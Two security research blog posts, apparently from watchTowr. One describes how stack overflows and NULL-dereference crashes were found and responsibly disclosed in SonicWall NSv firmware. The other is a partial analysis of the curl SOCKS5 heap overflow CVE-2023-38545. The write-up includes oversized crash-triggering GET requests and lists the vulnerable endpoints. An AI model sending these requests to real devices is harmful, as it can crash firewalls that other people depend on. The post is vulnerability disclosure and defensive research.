This is historically a good spot to hunt bugs - we’ve seen a significant amount of truly β€˜sky is falling’-level bugs in other appliances in this area - even recently - so perhaps we can replicate that success. We switch the SonicWall device to use the β€˜debug’ version of the binary, for more verbose logging and easier reversing, and get cracking (so to speak).

Indeed, once we start looking, the flames of our hopes are fanned by the code we see - lots and lots of 90s-style C code handing lots and lots of user-provided data. What could possibly go wrong?!

As we’ve mentioned in previous posts, it’s always a good starting point to map HTTP routes when analyzing any web service, and this is no different - except rather than finding those routes in an apache.conf on the filesystem, they’re in the binary itself, and in this case, they’re spread out into a few different places, from tables of read-only data and tables maintained at runtime, all the way to hardcoded case statements.

Let’s take a look at some of what SonicWall terms β€˜dynamic’ handlers. These are registered at system startup via the dynRegister function, which takes an ID, the URL of the object to register, and a handler function. Here’s an example:

[image: a dynRegister call in the disassembly]

Poking through some of these, there’s one for manipulating bookmark data for logged-in SSLVPN users. Who can spot the bug below?

__int64 __fastcall sub_3113AE4(unsigned int origin_socketIn, auto requestData, bool loginOverride)
{
  char domainName[128] = {0};
  char dest[200] = {0};

  unsigned int origin_socket = origin_socketIn;
  bool userIsLoggedIn = loginOverride || ((bool)checkUserLoggedIn(origin_socketIn));

  if ( requestData && requestData->unknown )
  {
    auto StringData = parseQueryStringData(requestData);
    for ( auto i = StringData; i != NULL; i = i->next )
    {
      if ( strcmp(i->paramName, "userName") == 0)
      {
        size_t paramDataLen = strlen(i->paramData);

        char* posOfAtSymbol = strchr(i->paramData, '@');
        if ( posOfAtSymbol != 0)
        {
          memcpy(dest, i->paramData, posOfAtSymbol - i->paramData);
          memcpy(domainName, posOfAtSymbol + 1, paramDataLen - (posOfAtSymbol - i->paramData) - 1);
        }
        else
        {
          memcpy(dest, i->paramData, paramDataLen);
        }
      }
      else if ( strcmp(i->paramName, "origin_socket") == 0 )
      {
        sscanf(i->paramData, "%d", &origin_socket);
      }
    }
    freeQueryStringData(StringData);
  }
  if ( !dest[0] )
    return 0xFFFFFFFFLL;
  if ( userIsLoggedIn)
    jsonPrintBookmarkArray(origin_socketIn, dest, domainName, origin_socket);
  return 0LL;
}

Those familiar with binary-level bug-hunting will quickly have their attention drawn to the fixed-size buffers - two of them, in this case - dest and domainName. They’ll also be interested in the memcpy calls, and will be positively gripped by the combination: developers are forever getting memcpy bounds wrong, and the result is a nice, easy-to-exploit stack overflow.
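Stripped of the surrounding plumbing, the unsafe pattern boils down to something like the sketch below. This is our own simplified reconstruction - the names and NUL-termination are ours, and the real handler’s buffers are 200 and 128 bytes:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified sketch of the vulnerable pattern: fixed-size stack buffers
 * filled via memcpy with lengths derived purely from attacker input. */
static void split_username(const char *param, char *user, char *domain) {
    size_t len = strlen(param);
    const char *at = strchr(param, '@');

    if (at) {
        /* Neither copy checks the destination size: a long enough
         * userName parameter overruns both stack buffers. */
        size_t userLen = (size_t)(at - param);
        memcpy(user, param, userLen);
        user[userLen] = '\0';
        memcpy(domain, at + 1, len - userLen - 1);
        domain[len - userLen - 1] = '\0';
    } else {
        memcpy(user, param, len);
        user[len] = '\0';
        domain[0] = '\0';
    }
}
```

With a short input this behaves itself; with a userName longer than the destination buffers, the memcpy calls write straight past them.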

Indeed, this function doesn’t disappoint - simply feeding it a large enough string is enough to overflow the stack buffer:

GET /api/sonicos/dynamic-file/getBookmarkList.json?userName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
[image: crash output]

Nice! Although accessing this endpoint requires authentication, as an SSLVPN user, this bug appeared to be pretty serious, enabling RCE as root. We celebrated our win, and only later thought to try the same bug on the non-debug version of the SonicWall appliance.

Saved by the compiler

Unfortunately, when we tried to replicate this vulnerability on a non-debug instance of the SonicWall, we found the machine would fail in a significantly more graceful manner, with a nasty SIGABRT instead of a lovely SIGSEGV:

[image: SIGABRT crash output]

What’s happening here?! Where’s our nice RCE?!


Well, let’s take a look at the differences between the debug and β€˜release’ versions of the code.

The debug version, which we can overflow:

[image: debug-build disassembly, calling plain memcpy]

And the release version, which we cannot:

[image: release-build disassembly, calling memcpy_chk]

What’s this?! β€œmemcpy_chk”?! Is this what’s causing our issues?

It turns out that when gcc is supplied with -D_FORTIFY_SOURCE=2 (and optimisation is enabled), calls to memcpy (and a handful of similar functions) whose destination size is known at compile time are replaced with calls to memcpy_chk (glibc’s __memcpy_chk). This performs the same copy as the original memcpy, but also checks the requested length against the destination buffer size - you can see it passed as the extra final argument in the release screenshot. The check ensures that any potential overrun is caught, and instead of overflowing the destination buffer (leading to that juicy RCE), the target calls abort and exits immediately. D’oh!
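The behaviour is easy to reproduce in isolation. The sketch below (ours, not SonicWall’s code) invokes GCC’s fortified-copy builtin directly - the same __memcpy_chk path that _FORTIFY_SOURCE routes memcpy through - in a forked child, and observes that the oversized copy dies with SIGABRT instead of smashing the stack:

```c
#include <assert.h>
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns the signal that terminates a child performing a fortified
 * memcpy whose length exceeds the destination's known size. */
static int fortified_overflow_signal(void) {
    pid_t pid = fork();
    if (pid == 0) {
        char dest[16];
        char src[64];
        memset(src, 'A', sizeof(src));
        /* The final argument is the compile-time destination size that
         * FORTIFY_SOURCE supplies; len > size triggers __chk_fail/abort. */
        __builtin___memcpy_chk(dest, src, sizeof(src), sizeof(dest));
        _exit(0); /* never reached */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}
```

This is why the release build crashes cleanly where the debug build hands us control of the stack.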

This has the effect of downgrading our RCE to a DoS bug when run against release versions of the SonicWall NSv. We estimate that the portion of users running the debug version is vanishingly small (if you’re running the debug version in production, we’d love to hear from you!), and so sadly reported this as an authenticated DoS bug to SonicWall. The CVE for this one is CVE-2023-39276 (see below for more info on fixed versions of the code).

Spurred on by our near-miss, we took a look through some of the other handlers, and spotted another stack overflow, this time in the sonicflow.csv handler, centering around the sn querystring parameter.

The same sort of thing happens, with a querystring parameter unsafely copied into a stack buffer:

char v21[64];

StringData = parseQueryStringData(a2);
for ( i = StringData; i; i = *i )
{
...
   if ( !strcmp(i->paramName, "sn") )
     strcpy(v21, i->paramData);
...
}
freeQueryStringData(StringData);

Whoops! Let’s feed it some A’s once again:

GET /api/sonicos/dynamic-file/sonicflow.csv?sn=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
[image: crash output]

Another stack overflow - sadly with the same caveat: on the NSv we analysed, it is only exploitable as a DoS in release mode (while debug mode is exploitable for full RCE).

We found the same bug was reachable from the appflowsessions.csv endpoint, and duly reported the bug to SonicWall. This vulnerability was assigned CVE-2023-39277.
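For completeness, the generic fix for this whole bug class is a bounded, always-terminated copy. A sketch of the pattern (not SonicWall’s actual patch):

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bounded copy: snprintf never writes more than dstlen bytes and always
 * NUL-terminates, so an oversized parameter is truncated, not an overflow. */
static void copy_param(char *dst, size_t dstlen, const char *param) {
    snprintf(dst, dstlen, "%s", param);
}
```

An oversized sn parameter would then simply be truncated rather than overflowing the stack buffer.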

A whole bunch of DoS bugs

So, at this juncture, we’ve got three CVEs - a hardcoded credential, and two stack overflows. Neat! What’s next?

Well, as regular readers might remember, some time ago we located a DoS bug in a competing device, Fortinet’s FortiGate, which relied on sending a GET request to an endpoint which would usually only receive a POST.

Since checks for a request body were erroneously omitted, the Fortinet device would assume a body was present on the GET request, and attempt to dereference a NULL pointer. We wondered - are such bugs more common than we thought? Perhaps a similar bug exists in the SonicWall device, too.

To search for this bug, we decided to extract routes from the binary directly (thus hitting lots of endpoints that aren’t currently used and thus might be missed by conventional spidering). In addition to the β€œdynamic” handlers above, we located a few tables containing route information.

Here’s the first:

.data:0000000008CB64C0 C9 DF 8C 04 00+off_8CB64C0     dq offset aActivationview_0 ; "activationView.html"
.data:0000000008CB64C8 00 08 00 00 00+                dq 800h
.data:0000000008CB64D0 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB64D8 DD DF 8C 04 00+                dq offset aActiveconnecti_2 ; "activeConnectionsMonitor.html"
.data:0000000008CB64E0 00 21 00 00 00+                dq 2100h
.data:0000000008CB64E8 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB64F0 FB DF 8C 04 00+                dq offset aAddafobjgroupd ; "addAFObjGroupDlg.html"
.data:0000000008CB64F8 00 00 00 00 00+                align 20h
.data:0000000008CB6500 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB6508 11 E0 8C 04 00+                dq offset aAddantispamall ; "addAntispamAllowListDlg.html"
.data:0000000008CB6510 00 09 00 00                    dd 900h
.data:0000000008CB6514 00 00 00 00                    dd 0
.data:0000000008CB6518 78 33 0B 0A 00+                dq offset qword_A0B3378
.data:0000000008CB6520 2E E0 8C 04 00+                dq offset aAddantispamrej ; "addAntispamRejectListDlg.html"

Here we have a series of structures, with each containing an endpoint filename, some kind of β€˜flags’ integer (which actually stores which methods are valid for each endpoint, along with required authentication information), and some kind of state object.

We wrote some quick IDAPython to pull out all the URLs, and continued our search. We found another table, containing far more interesting data. It’s quite verbose, as you can see:

.data:0000000008BCB240                ; sonicos_api_hateoas_entry URLHandlerTable
.data:0000000008BCB240 99 10 23 04 00+URLHandlerTable dq offset aApiSonicos_0 ; name
.data:0000000008BCB240 00 00 00 00 00+                                        ; DATA XREF: sub_189B1AD+19↑o
.data:0000000008BCB240 00 00 00 00 00+                                        ; sonicOsApi_serviceRequest+164↑o
.data:0000000008BCB248 00 01 01 00 00+                dq 0                    ; field_8 ; "/api/sonicos"
.data:0000000008BCB250 00 00 00 00 5E+                dq 101h                 ; info_GET.field_0
.data:0000000008BCB258 E1 8B 01 00 00+                dq offset sub_18BE15E   ; info_GET.handlerFunc
.data:0000000008BCB260 00 00 04 00 00+                dd expectedEmptyRequestBody; info_GET.flags
.data:0000000008BCB264 00 00 00 00 00+                dd 0                    ; info_GET.field_14
.data:0000000008BCB268 01 00 00 00 00+                dd 1                    ; info_GET.somethingToDoWithContentType_in
.data:0000000008BCB26C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB284 00 00 00 00 00+                dd 1                    ; info_GET.somethingToDoWithContentType_out
.data:0000000008BCB288 00 00 00 00 00+                db 6, 17h dup(0)
.data:0000000008BCB2A0 00 00 00 00 00+                dw 1                    ; info_GET.flagsToDoWithContentType
.data:0000000008BCB2A2 00 00 00 01 00+                db 6 dup(0)
.data:0000000008BCB2A8 00 00 06 00 00+                dq 0                    ; info_POST.field_0
.data:0000000008BCB2B0 00 00 00 00 00+                dq 0                    ; info_POST.handlerFunc
.data:0000000008BCB2B8 00 00 00 00 00+                dd 0                    ; info_POST.flags
.data:0000000008BCB2BC 00 00 00 00 00+                dd 0                    ; info_POST.field_14
.data:0000000008BCB2C0 00 00 00 00 00+                dd 0                    ; info_POST.somethingToDoWithContentType_in
.data:0000000008BCB2C4 00 01 00 00 00+                db 18h dup(0)
.data:0000000008BCB2DC 00 00 00 00 00+                dd 0                    ; info_POST.somethingToDoWithContentType_out
.data:0000000008BCB2E0 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB2F8 00 00 00 00 00+                dw 0                    ; info_POST.flagsToDoWithContentType
.data:0000000008BCB2FA 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB300 00 00 00 00 00+                dq 0                    ; info_PUT.field_0
.data:0000000008BCB308 00 00 00 00 00+                dq 0                    ; info_PUT.handlerFunc
.data:0000000008BCB310 00 00 00 00 00+                dd 0                    ; info_PUT.flags
.data:0000000008BCB314 00 00 00 00 00+                dd 0                    ; info_PUT.field_14
.data:0000000008BCB318 00 00 00 00 00+                dd 0                    ; info_PUT.somethingToDoWithContentType_in
.data:0000000008BCB31C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB334 00 00 00 00 00+                dd 0                    ; info_PUT.somethingToDoWithContentType_out
.data:0000000008BCB338 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB350 00 00 00 00 00+                dw 0                    ; info_PUT.flagsToDoWithContentType
.data:0000000008BCB352 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB358 00 00 00 00 00+                dq 0                    ; info_PATCH.field_0
.data:0000000008BCB360 00 00 00 00 00+                dq 0                    ; info_PATCH.handlerFunc
.data:0000000008BCB368 00 00 00 00 00+                dd 0                    ; info_PATCH.flags
.data:0000000008BCB36C 00 00 00 00 00+                dd 0                    ; info_PATCH.field_14
.data:0000000008BCB370 00 00 00 00 00+                dd 0                    ; info_PATCH.somethingToDoWithContentType_in
.data:0000000008BCB374 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB38C 00 00 00 00 00+                dd 0                    ; info_PATCH.somethingToDoWithContentType_out
.data:0000000008BCB390 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB3A8 00 00 00 00 00+                dw 0                    ; info_PATCH.flagsToDoWithContentType
.data:0000000008BCB3AA 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB3B0 00 00 00 00 00+                dq 0                    ; info_DELETE.field_0
.data:0000000008BCB3B8 00 00 00 00 00+                dq 0                    ; info_DELETE.handlerFunc
.data:0000000008BCB3C0 00 00 00 00 00+                dd 0                    ; info_DELETE.flags
.data:0000000008BCB3C4 00 00 00 00 00+                dd 0                    ; info_DELETE.field_14
.data:0000000008BCB3C8 00 00 00 00 00+                dd 0                    ; info_DELETE.somethingToDoWithContentType_in
.data:0000000008BCB3CC 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB3E4 00 00 00 00 00+                dd 0                    ; info_DELETE.somethingToDoWithContentType_out
.data:0000000008BCB3E8 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB400 00 00 00 00 00+                dw 0                    ; info_DELETE.flagsToDoWithContentType
.data:0000000008BCB402 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB408 00 00 00 00 00+                dq 0                    ; info_HEAD.field_0
.data:0000000008BCB410 00 00 00 00 00+                dq 0                    ; info_HEAD.handlerFunc
.data:0000000008BCB418 00 00 00 00 00+                dd 0                    ; info_HEAD.flags
.data:0000000008BCB41C 00 00 00 00 00+                dd 0                    ; info_HEAD.field_14
.data:0000000008BCB420 00 00 00 00 00+                dd 0                    ; info_HEAD.somethingToDoWithContentType_in
.data:0000000008BCB424 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB43C 00 00 00 00 00+                dd 0                    ; info_HEAD.somethingToDoWithContentType_out
.data:0000000008BCB440 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB458 00 00 00 00 00+                dw 0                    ; info_HEAD.flagsToDoWithContentType
.data:0000000008BCB45A 00 00 00 00 00+                db 6 dup(0)
.data:0000000008BCB460 00 00 00 00 00+                dq 0                    ; info_COMPLETE.field_0
.data:0000000008BCB468 00 00 00 00 00+                dq 0                    ; info_COMPLETE.handlerFunc
.data:0000000008BCB470 00 00 00 00 00+                dd 0                    ; info_COMPLETE.flags
.data:0000000008BCB474 00 00 00 00 00+                dd 0                    ; info_COMPLETE.field_14
.data:0000000008BCB478 00 00 00 00 00+                dd 0                    ; info_COMPLETE.somethingToDoWithContentType_in
.data:0000000008BCB47C 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB494 00 00 00 00 00+                dd 0                    ; info_COMPLETE.somethingToDoWithContentType_out
.data:0000000008BCB498 00 00 00 00 00+                db 18h dup(0)
.data:0000000008BCB4B0 00 00 00 00 00+                dw 0                    ; info_COMPLETE.flagsToDoWithContentType
.data:0000000008BCB4B2 00 00 00 00 00+                db 5 dup(0)
.data:0000000008BCB4B7 00 00 00 00 00+                db 0                    ; field_277
.data:0000000008BCB4B8                ; sonicos_api_hateoas_entry

It’s a big struct, but it’s actually simple.

The first element is the name of the endpoint being described (here /api/sonicos). This is followed by seven structures, each describing the endpoint’s behaviour under one verb - the standard GET, POST, PUT, PATCH, DELETE, and HEAD, plus the SonicWall-specific COMPLETE. Each of those structures specifies a handler function and some flags, along with some miscellaneous information. The flags specify whether the request should contain a request body, and whether access should only be granted to authenticated users.
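Reassembled into C, an entry looks roughly like the sketch below - the struct layout and all field names here are our own reconstruction from the disassembly, not SonicWall’s definitions:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*handler_fn)(void);

/* One record per verb: handler plus flags (request-body expected,
 * authentication required, content-type handling, ...). */
typedef struct {
    unsigned long field_0;
    handler_fn handler;
    unsigned flags;              /* e.g. expectedEmptyRequestBody */
} verb_info;

enum { VERB_GET, VERB_POST, VERB_PUT, VERB_PATCH,
       VERB_DELETE, VERB_HEAD, VERB_COMPLETE, VERB_COUNT };

/* Our guess at the shape of sonicos_api_hateoas_entry. */
typedef struct {
    const char *name;            /* "/api/sonicos" */
    verb_info verbs[VERB_COUNT]; /* info_GET .. info_COMPLETE */
} api_entry;

static int handle_get_root(void) { return 200; }

static const api_entry table[] = {
    { "/api/sonicos", { [VERB_GET] = { 0x101, handle_get_root, 1 } } },
};

/* Dispatch: find the entry by path, then the verb's handler
 * (NULL if that verb is not implemented for the endpoint). */
static handler_fn route(const char *path, int verb) {
    for (size_t i = 0; i < sizeof table / sizeof table[0]; i++)
        if (strcmp(table[i].name, path) == 0)
            return table[i].verbs[verb].handler;
    return NULL;
}
```

Dispatch is then a simple name lookup followed by indexing the verb’s record - endpoints with a NULL handler for a given verb reject that method.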

Again, we wrote some quick IDAPython to enumerate the endpoints, and added them to our list.

Now satisfied that we’ve amassed details of as many endpoints as we can (slightly over 600), we built an extremely low-tech fuzzer, by simply taking a list of endpoints and using a regular expression to turn each into a cURL request.

Sometimes simple is best, and there was no need to even write a Python script in this case! We went from our list of endpoints to a file similar to this:

curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/IgmpState.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"
curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/accessRuleStats.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"
curl  https://192.168.70.77:4433/api/sonicos/dynamic-file/accessRuleStats.xml --insecure --header "Authorization: Bearer [truncated]" --header "Content-Type: application/json, text/plain, */*"

If you’re following along at home, note the Content-Type header, which is required for handlers to be called.

Somewhat surprisingly, our 600-line batch script was successful in crashing the SonicWall appliance, with multiple endpoints causing individual crashes.

Each time we ran it, we simply took note of which URL crashed the device, commented it out, and re-ran the script to see if any other endpoints exhibited the same behaviour. Amazingly, we found no less than seven endpoints that crashed the SonicWall device in no less than six different code paths!


While we won’t bore you with the details of each, here’s a good example of what we found - fetching either of these two endpoints, after authentication, causes a NULL dereference.

GET /api/sonicos/dynamic-file/ssoStats-[any string].xml
GET /api/sonicos/dynamic-file/ssoStats-[any string].wri
[image: crash output]

Here’s a handy table of the codepaths and endpoints we found:

CVE             Endpoint                                                 Type                            Impact
CVE-2023-39278  /api/sonicos/main.cgi                                    Abort due to assertion failure  VPN-user authenticated DoS
CVE-2023-39279  /api/sonicos/dynamic-file/getPacketReplayData.json       NULL dereference                VPN-user authenticated DoS
CVE-2023-39280  /api/sonicos/dynamic-file/ssoStats-[any string].xml      NULL dereference                VPN-user authenticated DoS
                or /api/sonicos/dynamic-file/ssoStats-[any string].wri
CVE-2023-41711  /api/sonicos/dynamic-file/prefs.exp                      NULL dereference                VPN-user authenticated DoS
CVE-2023-41711  /api/sonicos/dynamic-file/sonicwall.exp                  NULL dereference                VPN-user authenticated DoS
CVE-2023-41712  /api/sonicos/dynamic-file/plainprefs.exp                 Abort due to assertion failure  VPN-user authenticated DoS

Conclusion

So, what have we got, in total? Well, five CVEs over seven endpoints above, plus the following:

CVE             Endpoint                                          Type                    Impact
CVE-2023-41713  Unknown                                           Hard-coded credentials  Unknown
CVE-2023-39277  /api/sonicos/dynamic-file/sonicflow.csv           Stack buffer overflow   VPN-user authenticated DoS (or RCE in debug mode)
                or /api/sonicos/dynamic-file/appflowsessions.csv
CVE-2023-39276  /api/sonicos/dynamic-file/getBookmarkList.json    Stack buffer overflow   VPN-user authenticated DoS (or RCE in debug mode)

Not a bad haul!

It is interesting - and slightly worrying, if we’re totally honest - that we found so many very simple bugs using our β€œregex and curl”-based β€œfuzzer”. Bugs this basic simply shouldn’t exist on a β€˜hardened’ border device like this. It is likely that the high barrier to entry (FDE, for example) has excluded many researchers who could otherwise have found these very straightforward bugs. It is very fortunate (and no doubt deliberate) that SonicWall build their NSv’s main codebase with FORTIFY_SOURCE.

The real moral of the story is a lesson for attackers and fellow researchers - attack β€˜hard’ targets, with significant barriers to entry, and often you’ll be surprised by just how β€˜soft’ they are.

All of these issues have been fixed by SonicWall. Depending on your device, the specific version containing updates may vary - refer to SonicWall's remediation advice, summarised below. Those who use the SSLVPN functionality are advised to upgrade to avoid potential DoS vulnerabilities, and those that run their devices in debug mode - if such users exist! - are advised to upgrade as a matter of urgency to avoid exposure to two authenticated RCE bugs.

[image: SonicWall's table of fixed versions]

In addition to assigning CVEs for these issues and issuing fixes, SonicWall took the extra step of providing us with a test build of their router firmware so that we could double-check that the issues had been fixed - a useful extra step to ensure the safety of their users. We also appreciate their recognition in admitting watchTowr to their β€˜hall of fame’.

[image: watchTowr in SonicWall's hall of fame]

Timeline

Date Detail
28th June 2023 Initial report to SonicWall PSIRT
29th June 2023 SonicWall PSIRT acknowledges report
6th July 2023 SonicWall PSIRT reports progress, requests more information for certain bugs
6th July 2023 watchTowr responds with more detail
10th August 2023 SonicWall PSIRT requests extension of 90-day grace period to β€œOctober 12-17th”
13th August 2023 watchTowr grants extension
8th September 2023 SonicWall PSIRT shares CVE details with watchTowr along with internal test build
24th September 2023 watchTowr confirms internal test build fixes bugs
17th October 2023 SonicWall PSIRT release fixes and advisory, https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0012

The Sky Has Not Yet Fallen - Curl (CVE-2023-38545)

11 October 2023 at 12:01

There are few packages as ubiquitous as the venerable cURL project. With over 25 years of development, and boasting β€œover ten billion installations”, it’s easy to see why a major security flaw could bring the Internet to a standstill - it’s on our endpoints, it’s on our routers, it’s on our IoT devices. It’s everywhere. And it’s written in C - what could go wrong?


Well, quite a lot, it seems.

A few months ago, the cURL maintainers warned us of a terrible, world-ending bug in their software, causing administrators and technical end-users alike to panic. Would attackers be able to hijack my enterprise router? My TV? My PDU, even!? The far-reaching effects of a real cURL RCE cannot be overstated.

Fortunately, once the bug was released, it turned out to be a bit of (in popular parlance) β€œa nothingburger”, requiring a very specific environment in order to metastasise into real danger. A close shave, but the world could rest easy again.


Last week, however, it looked like history was repeating itself, as the cURL project announced a β€œseverity HIGH CVE”. Administrators were urged to be ready to upgrade the second that patches were available (scheduled for today, October 11th), or suffer the dire consequences. Many were skeptical, some were worried.

Theories abounded - could this allow garden-variety SSRF vulnerabilities to be trivially converted into RCEs across the Internet? Could we see mass exploitation of libcurl in seemingly benign software that just makes simple GET requests?

Don’t worry - patches are here, and we’re here to cut through the hype and figure out what’s actually going on.

Fumbling the Embargo

Well, it seems the bug dropped a little bit early, as a publicly-viewable patch was committed to RedHat’s curl repository. The patch looks pretty simple, and fortunately for us, comes with a test case to trigger the bug. Great! Let’s dig in and see what changed.

[image: the patch diff]

That looks pretty straightforward. Two things have been removed: a warning (replaced with an error), and an assignment to the socks5_resolve_local variable. The comments above solidify our diagnosis:

[image: the comments accompanying the patch]

If you’ve used a SOCKS5 proxy, you may be aware that DNS resolution usually occurs on the β€˜server’ end of the connection - the client requests a hostname, and the server does the necessary DNS lookup to facilitate the connection. However, the SOCKS specification states that hostnames must not exceed 255 characters, and so the developer who wrote this code was careful to avoid sending such long requests. Instead, if a request was submitted with a long hostname, the local system would simply resolve the host itself, instead of using the SOCKS proxy.

No problem here, but if we take a look at other places where this socks5_resolve_local variable is assigned, we can see it near the top of the main Curl_SOCKS5 function. This function is invoked every time there is activity on the SOCKS connection.

CURLcode Curl_SOCKS5( .. )
{
bool socks5_resolve_local =
    (conn->socks_proxy.proxytype == CURLPROXY_SOCKS5) ? TRUE : FALSE;

This line simply re-applies the default behavior of resolving remotely, which has the unfortunate effect of undoing all the careful hostname-length checking done in the previous invocation, leading to an attempt to remotely resolve a hostname which has failed the length check. The remote-resolution logic assumes, understandably, that the hostname will never exceed 255 bytes - leading to a heap overflow.

The overflow actually occurs in the same function, in the following code snippet:

unsigned char *socksreq = &conn->cnnct.socksreq[0];

len = 0;
socksreq[len++] = 5; /* version (SOCKS5) */
socksreq[len++] = 1; /* connect */
socksreq[len++] = 0; /* must be zero */

if(!socks5_resolve_local) {
  socksreq[len++] = 3; /* ATYP: domain name = 3 */
  socksreq[len++] = (char) hostname_len; /* one byte address length */
  memcpy(&socksreq[len], hostname, hostname_len); /* address w/o NULL */
...

As you can see, we're copying the hostname into this socksreq variable, which is itself assigned from the conn->cnnct.socksreq field. Since the limit of 255 bytes has been bypassed, the hostname may be anywhere up to approximately 64KB.
